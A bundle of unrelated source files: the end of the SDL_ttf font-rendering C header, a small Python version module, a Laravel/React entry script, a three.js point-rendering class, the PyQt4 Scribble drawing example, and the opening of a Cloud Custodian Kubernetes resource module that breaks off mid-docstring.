/* ZERO WIDTH NO-BREAK SPACE (Unicode byte order mark) */
#define UNICODE_BOM_NATIVE 0xFEFF
#define UNICODE_BOM_SWAPPED 0xFFFE
/* This function tells the library whether UNICODE text is generally
byteswapped. A UNICODE BOM character in a string will override
this setting for the remainder of that string.
*/
extern DECLSPEC void SDLCALL TTF_ByteSwappedUNICODE(SDL_bool swapped);
/* The internal structure containing font information */
typedef struct _TTF_Font TTF_Font;
/* Initialize the TTF engine - returns 0 if successful, -1 on error */
extern DECLSPEC int SDLCALL TTF_Init(void);
/* Open a font file and create a font of the specified point size.
* Some .fon fonts will have several sizes embedded in the file, so the
* point size becomes the index of choosing which size. If the value
* is too high, the last indexed size will be the default. */
extern DECLSPEC TTF_Font * SDLCALL TTF_OpenFont(const char *file, int ptsize);
extern DECLSPEC TTF_Font * SDLCALL TTF_OpenFontIndex(const char *file, int ptsize, long index);
/* Open a font file from a SDL_RWops: 'src' must be kept alive for the lifetime of the TTF_Font.
* 'freesrc' can be set so that TTF_CloseFont closes the RWops */
extern DECLSPEC TTF_Font * SDLCALL TTF_OpenFontRW(SDL_RWops *src, int freesrc, int ptsize);
extern DECLSPEC TTF_Font * SDLCALL TTF_OpenFontIndexRW(SDL_RWops *src, int freesrc, int ptsize, long index);
/* Opens a font using the given horizontal and vertical target resolutions (in DPI).
* DPI scaling only applies to scalable fonts (e.g. TrueType). */
extern DECLSPEC TTF_Font * SDLCALL TTF_OpenFontDPI(const char *file, int ptsize, unsigned int hdpi, unsigned int vdpi);
extern DECLSPEC TTF_Font * SDLCALL TTF_OpenFontIndexDPI(const char *file, int ptsize, long index, unsigned int hdpi, unsigned int vdpi);
extern DECLSPEC TTF_Font * SDLCALL TTF_OpenFontDPIRW(SDL_RWops *src, int freesrc, int ptsize, unsigned int hdpi, unsigned int vdpi);
extern DECLSPEC TTF_Font * SDLCALL TTF_OpenFontIndexDPIRW(SDL_RWops *src, int freesrc, int ptsize, long index, unsigned int hdpi, unsigned int vdpi);
/* Set font size dynamically. This clears already generated glyphs, if any, from the cache. */
extern DECLSPEC int SDLCALL TTF_SetFontSize(TTF_Font *font, int ptsize);
extern DECLSPEC int SDLCALL TTF_SetFontSizeDPI(TTF_Font *font, int ptsize, unsigned int hdpi, unsigned int vdpi);
/* Set and retrieve the font style. Setting the style clears already generated glyphs, if any, from the cache. */
#define TTF_STYLE_NORMAL 0x00
#define TTF_STYLE_BOLD 0x01
#define TTF_STYLE_ITALIC 0x02
#define TTF_STYLE_UNDERLINE 0x04
#define TTF_STYLE_STRIKETHROUGH 0x08
extern DECLSPEC int SDLCALL TTF_GetFontStyle(const TTF_Font *font);
extern DECLSPEC void SDLCALL TTF_SetFontStyle(TTF_Font *font, int style);
extern DECLSPEC int SDLCALL TTF_GetFontOutline(const TTF_Font *font);
extern DECLSPEC void SDLCALL TTF_SetFontOutline(TTF_Font *font, int outline);
/* Set and retrieve FreeType hinter settings. Setting it clears already generated glyphs, if any, from the cache. */
#define TTF_HINTING_NORMAL 0
#define TTF_HINTING_LIGHT 1
#define TTF_HINTING_MONO 2
#define TTF_HINTING_NONE 3
#define TTF_HINTING_LIGHT_SUBPIXEL 4
extern DECLSPEC int SDLCALL TTF_GetFontHinting(const TTF_Font *font);
extern DECLSPEC void SDLCALL TTF_SetFontHinting(TTF_Font *font, int hinting);
/* Get the total height of the font - usually equal to point size */
extern DECLSPEC int SDLCALL TTF_FontHeight(const TTF_Font *font);
/* Get the offset from the baseline to the top of the font
This is a positive value, relative to the baseline.
*/
extern DECLSPEC int SDLCALL TTF_FontAscent(const TTF_Font *font);
/* Get the offset from the baseline to the bottom of the font
This is a negative value, relative to the baseline.
*/
extern DECLSPEC int SDLCALL TTF_FontDescent(const TTF_Font *font);
/* Get the recommended spacing between lines of text for this font */
extern DECLSPEC int SDLCALL TTF_FontLineSkip(const TTF_Font *font);
/* Get/Set whether or not kerning is allowed for this font */
extern DECLSPEC int SDLCALL TTF_GetFontKerning(const TTF_Font *font);
extern DECLSPEC void SDLCALL TTF_SetFontKerning(TTF_Font *font, int allowed);
/* Get the number of faces of the font */
extern DECLSPEC long SDLCALL TTF_FontFaces(const TTF_Font *font);
/* Get the font face attributes, if any */
extern DECLSPEC int SDLCALL TTF_FontFaceIsFixedWidth(const TTF_Font *font);
extern DECLSPEC char * SDLCALL TTF_FontFaceFamilyName(const TTF_Font *font);
extern DECLSPEC char * SDLCALL TTF_FontFaceStyleName(const TTF_Font *font);
/* Check whether a glyph is provided by the font or not */
extern DECLSPEC int SDLCALL TTF_GlyphIsProvided(TTF_Font *font, Uint16 ch);
extern DECLSPEC int SDLCALL TTF_GlyphIsProvided32(TTF_Font *font, Uint32 ch);
/* Get the metrics (dimensions) of a glyph
To understand what these metrics mean, here is a useful link:
http://freetype.sourceforge.net/freetype2/docs/tutorial/step2.html
*/
extern DECLSPEC int SDLCALL TTF_GlyphMetrics(TTF_Font *font, Uint16 ch,
int *minx, int *maxx,
int *miny, int *maxy, int *advance);
extern DECLSPEC int SDLCALL TTF_GlyphMetrics32(TTF_Font *font, Uint32 ch,
int *minx, int *maxx,
int *miny, int *maxy, int *advance);
/* Get the dimensions of a rendered string of text */
extern DECLSPEC int SDLCALL TTF_SizeText(TTF_Font *font, const char *text, int *w, int *h);
extern DECLSPEC int SDLCALL TTF_SizeUTF8(TTF_Font *font, const char *text, int *w, int *h);
extern DECLSPEC int SDLCALL TTF_SizeUNICODE(TTF_Font *font, const Uint16 *text, int *w, int *h);
/* Get the measurement string of text without rendering
e.g. the number of characters that can be rendered before reaching 'measure_width'
in:
measure_width - in pixels to measure this text
out:
count - number of characters that can be rendered
extent - latest calculated width
*/
extern DECLSPEC int SDLCALL TTF_MeasureText(TTF_Font *font, const char *text, int measure_width, int *extent, int *count);
extern DECLSPEC int SDLCALL TTF_MeasureUTF8(TTF_Font *font, const char *text, int measure_width, int *extent, int *count);
extern DECLSPEC int SDLCALL TTF_MeasureUNICODE(TTF_Font *font, const Uint16 *text, int measure_width, int *extent, int *count);
/* Create an 8-bit palettized surface and render the given text at
fast quality with the given font and color. The 0 pixel is the
colorkey, giving a transparent background, and the 1 pixel is set
to the text color.
This function returns the new surface, or NULL if there was an error.
*/
extern DECLSPEC SDL_Surface * SDLCALL TTF_RenderText_Solid(TTF_Font *font,
const char *text, SDL_Color fg);
extern DECLSPEC SDL_Surface * SDLCALL TTF_RenderUTF8_Solid(TTF_Font *font,
const char *text, SDL_Color fg);
extern DECLSPEC SDL_Surface * SDLCALL TTF_RenderUNICODE_Solid(TTF_Font *font,
const Uint16 *text, SDL_Color fg);
/* Create an 8-bit palettized surface and render the given text at
fast quality with the given font and color. The 0 pixel is the
colorkey, giving a transparent background, and the 1 pixel is set
to the text color.
Text is wrapped to multiple lines on line endings and on word boundaries
if it extends beyond wrapLength in pixels.
If wrapLength is 0, only wrap on new lines.
This function returns the new surface, or NULL if there was an error.
*/
extern DECLSPEC SDL_Surface * SDLCALL TTF_RenderText_Solid_Wrapped(TTF_Font *font,
const char *text, SDL_Color fg, Uint32 wrapLength);
extern DECLSPEC SDL_Surface * SDLCALL TTF_RenderUTF8_Solid_Wrapped(TTF_Font *font,
const char *text, SDL_Color fg, Uint32 wrapLength);
extern DECLSPEC SDL_Surface * SDLCALL TTF_RenderUNICODE_Solid_Wrapped(TTF_Font *font,
const Uint16 *text, SDL_Color fg, Uint32 wrapLength);
/* Create an 8-bit palettized surface and render the given glyph at
fast quality with the given font and color. The 0 pixel is the
colorkey, giving a transparent background, and the 1 pixel is set
to the text color. The glyph is rendered without any padding or
centering in the X direction, and aligned normally in the Y direction.
This function returns the new surface, or NULL if there was an error.
*/
extern DECLSPEC SDL_Surface * SDLCALL TTF_RenderGlyph_Solid(TTF_Font *font,
Uint16 ch, SDL_Color fg);
extern DECLSPEC SDL_Surface * SDLCALL TTF_RenderGlyph32_Solid(TTF_Font *font,
Uint32 ch, SDL_Color fg);
/* Create an 8-bit palettized surface and render the given text at
high quality with the given font and colors. The 0 pixel is background,
while other pixels have varying degrees of the foreground color.
This function returns the new surface, or NULL if there was an error.
*/
extern DECLSPEC SDL_Surface * SDLCALL TTF_RenderText_Shaded(TTF_Font *font,
const char *text, SDL_Color fg, SDL_Color bg);
extern DECLSPEC SDL_Surface * SDLCALL TTF_RenderUTF8_Shaded(TTF_Font *font,
const char *text, SDL_Color fg, SDL_Color bg);
extern DECLSPEC SDL_Surface * SDLCALL TTF_RenderUNICODE_Shaded(TTF_Font *font,
const Uint16 *text, SDL_Color fg, SDL_Color bg);
/* Create an 8-bit palettized surface and render the given text at
high quality with the given font and colors. The 0 pixel is background,
while other pixels have varying degrees of the foreground color.
Text is wrapped to multiple lines on line endings and on word boundaries
if it extends beyond wrapLength in pixels.
If wrapLength is 0, only wrap on new lines.
This function returns the new surface, or NULL if there was an error.
*/
extern DECLSPEC SDL_Surface * SDLCALL TTF_RenderText_Shaded_Wrapped(TTF_Font *font,
const char *text, SDL_Color fg, SDL_Color bg, Uint32 wrapLength);
extern DECLSPEC SDL_Surface * SDLCALL TTF_RenderUTF8_Shaded_Wrapped(TTF_Font *font,
const char *text, SDL_Color fg, SDL_Color bg, Uint32 wrapLength);
extern DECLSPEC SDL_Surface * SDLCALL TTF_RenderUNICODE_Shaded_Wrapped(TTF_Font *font,
const Uint16 *text, SDL_Color fg, SDL_Color bg, Uint32 wrapLength);
/* Create an 8-bit palettized surface and render the given glyph at
high quality with the given font and colors. The 0 pixel is background,
while other pixels have varying degrees of the foreground color.
The glyph is rendered without any padding or centering in the X
direction, and aligned normally in the Y direction.
This function returns the new surface, or NULL if there was an error.
*/
extern DECLSPEC SDL_Surface * SDLCALL TTF_RenderGlyph_Shaded(TTF_Font *font,
Uint16 ch, SDL_Color fg, SDL_Color bg);
extern DECLSPEC SDL_Surface * SDLCALL TTF_RenderGlyph32_Shaded(TTF_Font *font,
Uint32 ch, SDL_Color fg, SDL_Color bg);
/* Create a 32-bit ARGB surface and render the given text at high quality,
using alpha blending to dither the font with the given color.
This function returns the new surface, or NULL if there was an error.
*/
extern DECLSPEC SDL_Surface * SDLCALL TTF_RenderText_Blended(TTF_Font *font,
const char *text, SDL_Color fg);
extern DECLSPEC SDL_Surface * SDLCALL TTF_RenderUTF8_Blended(TTF_Font *font,
const char *text, SDL_Color fg);
extern DECLSPEC SDL_Surface * SDLCALL TTF_RenderUNICODE_Blended(TTF_Font *font,
const Uint16 *text, SDL_Color fg);
/* Create a 32-bit ARGB surface and render the given text at high quality,
using alpha blending to dither the font with the given color.
Text is wrapped to multiple lines on line endings and on word boundaries
if it extends beyond wrapLength in pixels.
If wrapLength is 0, only wrap on new lines.
This function returns the new surface, or NULL if there was an error.
*/
extern DECLSPEC SDL_Surface * SDLCALL TTF_RenderText_Blended_Wrapped(TTF_Font *font,
const char *text, SDL_Color fg, Uint32 wrapLength);
extern DECLSPEC SDL_Surface * SDLCALL TTF_RenderUTF8_Blended_Wrapped(TTF_Font *font,
const char *text, SDL_Color fg, Uint32 wrapLength);
extern DECLSPEC SDL_Surface * SDLCALL TTF_RenderUNICODE_Blended_Wrapped(TTF_Font *font,
const Uint16 *text, SDL_Color fg, Uint32 wrapLength);
/* Create a 32-bit ARGB surface and render the given glyph at high quality,
using alpha blending to dither the font with the given color.
The glyph is rendered without any padding or centering in the X
direction, and aligned normally in the Y direction.
This function returns the new surface, or NULL if there was an error.
*/
extern DECLSPEC SDL_Surface * SDLCALL TTF_RenderGlyph_Blended(TTF_Font *font,
Uint16 ch, SDL_Color fg);
extern DECLSPEC SDL_Surface * SDLCALL TTF_RenderGlyph32_Blended(TTF_Font *font,
Uint32 ch, SDL_Color fg);
/* For compatibility with previous versions, here are the old functions */
#define TTF_RenderText(font, text, fg, bg) \
TTF_RenderText_Shaded(font, text, fg, bg)
#define TTF_RenderUTF8(font, text, fg, bg) \
TTF_RenderUTF8_Shaded(font, text, fg, bg)
#define TTF_RenderUNICODE(font, text, fg, bg) \
TTF_RenderUNICODE_Shaded(font, text, fg, bg)
/* Set Direction and Script to be used for text shaping.
- direction is of type hb_direction_t
- script is of type hb_script_t
This function always returns 0, or -1 if SDL_ttf was not compiled with HarfBuzz
*/
extern DECLSPEC int SDLCALL TTF_SetDirection(int direction); /* hb_direction_t */
extern DECLSPEC int SDLCALL TTF_SetScript(int script); /* hb_script_t */
/* Set direction and script per font */
extern DECLSPEC int SDLCALL TTF_SetFontDirection(TTF_Font *font, int direction); /* hb_direction_t */
extern DECLSPEC int SDLCALL TTF_SetFontScript(TTF_Font *font, int script); /* hb_script_t */
/* Close an opened font file */
extern DECLSPEC void SDLCALL TTF_CloseFont(TTF_Font *font);
/* De-initialize the TTF engine */
extern DECLSPEC void SDLCALL TTF_Quit(void);
/* Check if the TTF engine is initialized */
extern DECLSPEC int SDLCALL TTF_WasInit(void);
/* Get the kerning size of two glyphs indices */
/* DEPRECATED: this function requires FreeType font indexes, not glyphs,
by accident, which we don't expose through this API, so it could give
wildly incorrect results, especially with non-ASCII values.
Going forward, please use TTF_GetFontKerningSizeGlyphs() instead, which
does what you probably expected this function to do. */
extern DECLSPEC int TTF_GetFontKerningSize(TTF_Font *font, int prev_index, int index) SDL_DEPRECATED;
/* Get the kerning size of two glyphs */
extern DECLSPEC int TTF_GetFontKerningSizeGlyphs(TTF_Font *font, Uint16 previous_ch, Uint16 ch);
extern DECLSPEC int TTF_GetFontKerningSizeGlyphs32(TTF_Font *font, Uint32 previous_ch, Uint32 ch);
/* Enable Signed Distance Field rendering (with the Blended APIs) */
extern DECLSPEC int TTF_SetFontSDF(TTF_Font *font, SDL_bool on_off);
extern DECLSPEC SDL_bool TTF_GetFontSDF(const TTF_Font *font);
/* We'll use SDL for reporting errors */
#define TTF_SetError SDL_SetError
#define TTF_GetError SDL_GetError
/* Ends C function definitions when using C++ */
#ifdef __cplusplus
}
#endif
#include "close_code.h"
#endif /* SDL_TTF_H_ */
/* vi: set ts=4 sw=4 expandtab: */
|
# Python 2/3 compatibility shims for this module.
from __future__ import unicode_literals
from __future__ import print_function
from __future__ import division
from __future__ import absolute_import
# Single source of truth for the package version string.
__version__ = '0.8.2'
|
/**
* First we will load all of this project's JavaScript dependencies which
* includes React and other helpers. It's a great starting point while
* building robust, powerful web applications using React + Laravel.
*/
require('./bootstrap');
/* Import the Main component */
import Main from './components/Main'; |
// TODO: This file was created by bulk-decaffeinate.
// Sanity-check the conversion and remove this comment.
/*
* decaffeinate suggestions:
* DS102: Remove unnecessary code created because of implicit returns
* DS104: Avoid inline assignments
* DS207: Consider shorter variations of null checks
* Full docs: https://github.com/decaffeinate/decaffeinate/blob/master/docs/suggestions.md
*/
import * as THREE from "three";
import { Base } from "./base";
import { SpriteGeometry } from "../geometry";
export class Point extends Base {
constructor(renderer, shaders, options) {
let f, left;
super(renderer, shaders, options);
let {
uniforms,
material,
position,
color,
size,
mask,
map,
combine,
linear,
shape,
optical,
fill,
stpq,
} = options;
if (uniforms == null) {
uniforms = {};
}
shape = +shape != null ? +shape : 0;
if (fill == null) {
fill = true;
}
const hasStyle = uniforms.styleColor != null;
const shapes = [
"circle",
"square",
"diamond",
"up",
"down",
"left",
"right",
];
const passes = [
"circle",
"generic",
"generic",
"generic",
"generic",
"generic",
"generic",
];
const scales = [1.2, 1, 1.414, 1.16, 1.16, 1.16, 1.16];
const pass = passes[shape] != null ? passes[shape] : passes[0];
const _shape = shapes[shape] != null ? shapes[shape] : shapes[0];
const _scale = (left = optical && scales[shape]) != null ? left : 1;
const alpha = fill ? pass : `${pass}.hollow`;
this.geometry = new SpriteGeometry({
items: options.items,
width: options.width,
height: options.height,
depth: options.depth,
});
this._adopt(uniforms);
this._adopt(this.geometry.uniforms);
const defines = { POINT_SHAPE_SCALE: +(_scale + 0.00001) };
// Shared vertex shader
const factory = shaders.material();
const v = factory.vertex;
v.pipe(this._vertexColor(color, mask));
// Point sizing
if (size) {
v.isolate();
v.require(size);
v.require("point.size.varying", this.uniforms);
v.end();
} else {
v.require("point.size.uniform", this.uniforms);
}
v.require(this._vertexPosition(position, material, map, 2, stpq));
v.pipe("point.position", this.uniforms, defines);
v.pipe("project.position", this.uniforms);
// Shared fragment shader
factory.fragment = f = this._fragmentColor(
hasStyle,
material,
color,
mask,
map,
2,
stpq,
combine,
linear
);
// Split fragment into edge and fill pass for better z layering
const edgeFactory = shaders.material();
edgeFactory.vertex.pipe(v);
f = edgeFactory.fragment.pipe(factory.fragment);
f.require(`point.mask.${_shape}`, this.uniforms);
f.require(`point.alpha.${alpha}`, this.uniforms);
f.pipe("point.edge", this.uniforms);
const fillFactory = shaders.material();
fillFactory.vertex.pipe(v);
f = fillFactory.fragment.pipe(factory.fragment);
f.require(`point.mask.${_shape}`, this.uniforms);
f.require(`point.alpha.${alpha}`, this.uniforms);
f.pipe("point.fill", this.uniforms);
this.fillMaterial = this._material(
fillFactory.link({
side: THREE.DoubleSide,
})
);
this.edgeMaterial = this._material(
edgeFactory.link({
side: THREE.DoubleSide,
})
);
this.fillObject = new THREE.Mesh(this.geometry, this.fillMaterial);
this.edgeObject = new THREE.Mesh(this.geometry, this.edgeMaterial);
this._raw(this.fillObject);
this._raw(this.edgeObject);
this.renders = [this.fillObject, this.edgeObject];
}
// Show both render passes. The edge pass is always drawn transparent
// (for anti-aliased outlines); the fill pass honors the caller's
// `transparent` flag. Returns the result of showing the fill pass.
show(transparent, blending, order, depth) {
  this._show(this.edgeObject, true, blending, order, depth);
  return this._show(this.fillObject, transparent, blending, order, depth);
}
dispose() {
this.geometry.dispose();
this.edgeMaterial.dispose();
this.fillMaterial.dispose();
this.renders =
this.edgeObject =
this.fillObject =
this.geometry =
this.edgeMaterial =
this.fillMaterial =
null;
return super.dispose();
}
}
|
#!/usr/bin/env python
# http://stackoverflow.com/a/8556231/5288758
#############################################################################
##
## Copyright (C) 2010 Riverbank Computing Limited.
## Copyright (C) 2010 Nokia Corporation and/or its subsidiary(-ies).
## All rights reserved.
##
## This file is part of the examples of PyQt.
##
## $QT_BEGIN_LICENSE:BSD$
## You may use this file under the terms of the BSD license as follows:
##
## "Redistribution and use in source and binary forms, with or without
## modification, are permitted provided that the following conditions are
## met:
## * Redistributions of source code must retain the above copyright
## notice, this list of conditions and the following disclaimer.
## * Redistributions in binary form must reproduce the above copyright
## notice, this list of conditions and the following disclaimer in
## the documentation and/or other materials provided with the
## distribution.
## * Neither the name of Nokia Corporation and its Subsidiary(-ies) nor
## the names of its contributors may be used to endorse or promote
## products derived from this software without specific prior written
## permission.
##
## THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
## "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
## LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR
## A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT
## OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
## SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT
## LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,
## DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY
## THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
## (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
## OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE."
## $QT_END_LICENSE$
##
#############################################################################
# These are only needed for Python v2 but are harmless for Python v3.
import sip
# Select the modern (v2) API for QString/QVariant *before* PyQt4 is
# imported, so Qt strings map to native Python str objects.
sip.setapi('QString', 2)
sip.setapi('QVariant', 2)
from PyQt4 import QtCore, QtGui
class ScribbleArea(QtGui.QWidget):
    """Off-screen-image drawing canvas.

    Dragging with the left mouse button paints onto a backing QImage,
    which paintEvent() blits to the screen. The backing image is grown
    (canvas extension on white, no resampling) whenever the widget grows.

    NOTE(review): openImage() calls ``self.mainWindow.resize``;
    ``mainWindow`` is injected externally (see MainWindow.__init__) —
    confirm it is always set before openImage() can be reached.
    """

    def __init__(self, parent=None):
        super(ScribbleArea, self).__init__(parent)
        self.setAttribute(QtCore.Qt.WA_StaticContents)
        self.modified = False      # True while there are unsaved strokes
        self.scribbling = False    # True while the left button is held
        self.myPenWidth = 1
        self.myPenColor = QtCore.Qt.blue
        imageSize = QtCore.QSize(500, 500)
        self.image = QtGui.QImage(imageSize, QtGui.QImage.Format_RGB32)
        self.lastPoint = QtCore.QPoint()

    def openImage(self, fileName):
        """Load ``fileName`` into the canvas; return True on success."""
        loadedImage = QtGui.QImage()
        if not loadedImage.load(fileName):
            return False
        w = loadedImage.width()
        h = loadedImage.height()
        # Resize the owning window to fit the loaded image.
        self.mainWindow.resize(w, h)
        self.image = loadedImage
        self.modified = False
        self.update()
        return True

    def saveImage(self, fileName, fileFormat):
        """Save the visible canvas to ``fileName``; return True on success."""
        self.resizeImage(self.image, self.size())
        # BUG FIX: resizeImage() replaces self.image with a *new* QImage,
        # so the original code's pre-resize reference saved the stale
        # image. Re-read self.image after resizing so the current canvas
        # (at the visible widget size) is what gets written to disk.
        visibleImage = self.image
        if visibleImage.save(fileName, fileFormat):
            self.modified = False
            return True
        return False

    def setPenColor(self, newColor):
        self.myPenColor = newColor

    def setPenWidth(self, newWidth):
        self.myPenWidth = newWidth

    def clearImage(self):
        """Fill the canvas with white and mark it as modified."""
        self.image.fill(QtGui.qRgb(255, 255, 255))
        self.modified = True
        self.update()

    def mousePressEvent(self, event):
        # Start a stroke on left-button press.
        if event.button() == QtCore.Qt.LeftButton:
            self.lastPoint = event.pos()
            self.scribbling = True

    def mouseMoveEvent(self, event):
        if (event.buttons() & QtCore.Qt.LeftButton) and self.scribbling:
            self.drawLineTo(event.pos())

    def mouseReleaseEvent(self, event):
        if event.button() == QtCore.Qt.LeftButton and self.scribbling:
            self.drawLineTo(event.pos())
            self.scribbling = False

    def paintEvent(self, event):
        # Blit the backing image onto the widget.
        painter = QtGui.QPainter(self)
        painter.drawImage(event.rect(), self.image)

    def resizeEvent(self, event):
        # Keep the backing image in sync with the widget size.
        self.resizeImage(self.image, event.size())
        super(ScribbleArea, self).resizeEvent(event)

    def drawLineTo(self, endPoint):
        """Paint a line from the last recorded point to ``endPoint``."""
        painter = QtGui.QPainter(self.image)
        painter.setPen(QtGui.QPen(self.myPenColor, self.myPenWidth,
                                  QtCore.Qt.SolidLine, QtCore.Qt.RoundCap,
                                  QtCore.Qt.RoundJoin))
        painter.drawLine(self.lastPoint, endPoint)
        self.modified = True
        self.update()
        self.lastPoint = QtCore.QPoint(endPoint)

    def resizeImage(self, image, newSize):
        """Extend the canvas to ``newSize``, preserving existing pixels.

        Creates a white image of the new size, copies ``image`` into its
        top-left corner (no resampling), and installs it as self.image.
        No-op when the size is unchanged.
        """
        if image.size() == newSize:
            return
        newImage = QtGui.QImage(newSize, QtGui.QImage.Format_RGB32)
        newImage.fill(QtGui.qRgb(255, 255, 255))
        painter = QtGui.QPainter(newImage)
        painter.drawImage(QtCore.QPoint(0, 0), image)
        self.image = newImage

    def print_(self):
        """Print the canvas, scaled to fit the page, via a print dialog."""
        printer = QtGui.QPrinter(QtGui.QPrinter.HighResolution)
        printDialog = QtGui.QPrintDialog(printer, self)
        if printDialog.exec_() == QtGui.QDialog.Accepted:
            painter = QtGui.QPainter(printer)
            rect = painter.viewport()
            size = self.image.size()
            # Scale to the printable area while keeping the aspect ratio.
            size.scale(rect.size(), QtCore.Qt.KeepAspectRatio)
            painter.setViewport(rect.x(), rect.y(),
                                size.width(), size.height())
            painter.setWindow(self.image.rect())
            painter.drawImage(0, 0, self.image)
            painter.end()

    def isModified(self):
        return self.modified

    def penColor(self):
        return self.myPenColor

    def penWidth(self):
        return self.myPenWidth
class MainWindow(QtGui.QMainWindow):
    """Top-level window: wires a ScribbleArea to menus, actions and dialogs."""

    def __init__(self):
        super(MainWindow, self).__init__()
        self.saveAsActs = []
        self.scribbleArea = ScribbleArea(self)
        self.scribbleArea.clearImage()
        # Back-reference used by ScribbleArea.openImage() to resize us.
        self.scribbleArea.mainWindow = self
        self.setCentralWidget(self.scribbleArea)
        self.createActions()
        self.createMenus()
        self.setWindowTitle("Scribble")
        self.resize(500, 500)

    def closeEvent(self, event):
        """Offer to save unsaved changes before allowing the close."""
        if self.maybeSave():
            event.accept()
        else:
            event.ignore()

    def open(self):
        """Prompt for a file and load it into the canvas."""
        if self.maybeSave():
            fileName = QtGui.QFileDialog.getOpenFileName(
                self, "Open File", QtCore.QDir.currentPath())
            if fileName:
                self.scribbleArea.openImage(fileName)

    def save(self):
        # Triggered by one of the per-format "Save As" actions; the
        # image format string travels on the triggering action's data.
        action = self.sender()
        fileFormat = action.data()
        self.saveFile(fileFormat)

    def penColor(self):
        """Let the user pick a new pen color."""
        newColor = QtGui.QColorDialog.getColor(self.scribbleArea.penColor())
        if newColor.isValid():
            self.scribbleArea.setPenColor(newColor)

    def penWidth(self):
        """Let the user pick a new pen width (1-50)."""
        newWidth, ok = QtGui.QInputDialog.getInteger(
            self, "Scribble", "Select pen width:",
            self.scribbleArea.penWidth(), 1, 50, 1)
        if ok:
            self.scribbleArea.setPenWidth(newWidth)

    def about(self):
        QtGui.QMessageBox.about(self, "About Scribble",
            "<p>The <b>Scribble</b> example shows how to use "
            "QMainWindow as the base widget for an application, and how "
            "to reimplement some of QWidget's event handlers to receive "
            "the events generated for the application's widgets:</p>"
            "<p> We reimplement the mouse event handlers to facilitate "
            "drawing, the paint event handler to update the application "
            "and the resize event handler to optimize the application's "
            "appearance. In addition we reimplement the close event "
            "handler to intercept the close events before terminating "
            "the application.</p>"
            "<p> The example also demonstrates how to use QPainter to "
            "draw an image in real time, as well as to repaint "
            "widgets.</p>")

    def createActions(self):
        """Build all menu actions, including one Save As per image format."""
        self.openAct = QtGui.QAction("&Open...", self, shortcut="Ctrl+O",
                                     triggered=self.open)
        # FIX: the loop variable was named `format`, shadowing the
        # built-in of the same name; renamed to `fmt`.
        for fmt in QtGui.QImageWriter.supportedImageFormats():
            fmt = str(fmt)
            text = fmt.upper() + "..."
            action = QtGui.QAction(text, self, triggered=self.save)
            action.setData(fmt)
            self.saveAsActs.append(action)
        self.printAct = QtGui.QAction("&Print...", self,
                                      triggered=self.scribbleArea.print_)
        self.exitAct = QtGui.QAction("E&xit", self, shortcut="Ctrl+Q",
                                     triggered=self.close)
        self.penColorAct = QtGui.QAction("&Pen Color...", self,
                                         triggered=self.penColor)
        self.penWidthAct = QtGui.QAction("Pen &Width...", self,
                                         triggered=self.penWidth)
        self.clearScreenAct = QtGui.QAction(
            "&Clear Screen", self, shortcut="Ctrl+L",
            triggered=self.scribbleArea.clearImage)
        self.aboutAct = QtGui.QAction("&About", self, triggered=self.about)
        self.aboutQtAct = QtGui.QAction("About &Qt", self,
                                        triggered=QtGui.qApp.aboutQt)

    def createMenus(self):
        """Assemble the File / Options / Help menu bar."""
        self.saveAsMenu = QtGui.QMenu("&Save As", self)
        for action in self.saveAsActs:
            self.saveAsMenu.addAction(action)
        fileMenu = QtGui.QMenu("&File", self)
        fileMenu.addAction(self.openAct)
        fileMenu.addMenu(self.saveAsMenu)
        fileMenu.addAction(self.printAct)
        fileMenu.addSeparator()
        fileMenu.addAction(self.exitAct)
        optionMenu = QtGui.QMenu("&Options", self)
        optionMenu.addAction(self.penColorAct)
        optionMenu.addAction(self.penWidthAct)
        optionMenu.addSeparator()
        optionMenu.addAction(self.clearScreenAct)
        helpMenu = QtGui.QMenu("&Help", self)
        helpMenu.addAction(self.aboutAct)
        helpMenu.addAction(self.aboutQtAct)
        self.menuBar().addMenu(fileMenu)
        self.menuBar().addMenu(optionMenu)
        self.menuBar().addMenu(helpMenu)

    def maybeSave(self):
        """Prompt to save pending changes; return False if Cancel was chosen."""
        if self.scribbleArea.isModified():
            ret = QtGui.QMessageBox.warning(
                self, "Scribble",
                "The image has been modified.\n"
                "Do you want to save your changes?",
                QtGui.QMessageBox.Save | QtGui.QMessageBox.Discard |
                QtGui.QMessageBox.Cancel)
            if ret == QtGui.QMessageBox.Save:
                return self.saveFile('png')
            elif ret == QtGui.QMessageBox.Cancel:
                return False
        return True

    def saveFile(self, fileFormat):
        """Prompt for a destination and save in ``fileFormat``."""
        initialPath = QtCore.QDir.currentPath() + '/untitled.' + fileFormat
        fileName = QtGui.QFileDialog.getSaveFileName(
            self, "Save As", initialPath,
            "%s Files (*.%s);;All Files (*)" % (fileFormat.upper(), fileFormat))
        if fileName:
            return self.scribbleArea.saveImage(fileName, fileFormat)
        return False
# Standard Qt bootstrap: create the application, show the main window,
# then hand control to the Qt event loop and exit with its status code.
if __name__ == '__main__':
    import sys
    app = QtGui.QApplication(sys.argv)
    window = MainWindow()
    window.show()
    sys.exit(app.exec_())
# Copyright The Cloud Custodian Authors.
# SPDX-License-Identifier: Apache-2.0
import logging
import c7n_kube.actions.shared # noqa
from c7n_kube.resources.core import (
configmap,
namespace,
node,
pod,
replicationcontroller,
secret,
service,
serviceaccount,
volume)
from c7n_kube.resources.apps import (
daemonset,
deployment,
replicaset,
statefulset)
from c7n_kube.resources import crd
log = logging.getLogger('custodian.k8s')

# Every resource module shipped by this provider. Resources register
# themselves as a side effect of the imports above; this list keeps
# explicit references to the modules.
ALL = [
    crd,
    configmap,
    deployment,
    namespace,
    node,
    pod,
    replicationcontroller,
    secret,
    service,
    serviceaccount,
    volume,
    daemonset,
    replicaset,
    statefulset]
def initialize_kube():
    """Kubernetes provider entry point.

